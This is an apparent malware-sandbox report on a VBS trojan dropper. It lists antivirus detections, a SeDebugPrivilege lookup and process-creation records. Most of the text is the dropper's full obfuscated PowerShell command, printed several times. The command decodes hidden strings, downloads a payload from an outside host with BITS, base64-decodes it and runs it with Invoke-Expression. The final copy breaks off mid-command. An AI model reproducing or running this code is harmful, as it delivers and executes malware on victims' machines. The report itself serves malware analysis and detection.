'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}"
wmi select * from win32_process where ProcessId=2752
wmi Select * from Win32_Service
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}"
filepath: powershell
1 1 0
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.VBS.SAgent.gen
Avira VBS/Agent.bpv
ZoneAlarm HEUR:Trojan.VBS.SAgent.gen
Microsoft Trojan:Script/Wacatac.H!ml
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}"
parent_process wscript.exe martian_process powershell "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}"
cmdline powershell "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und 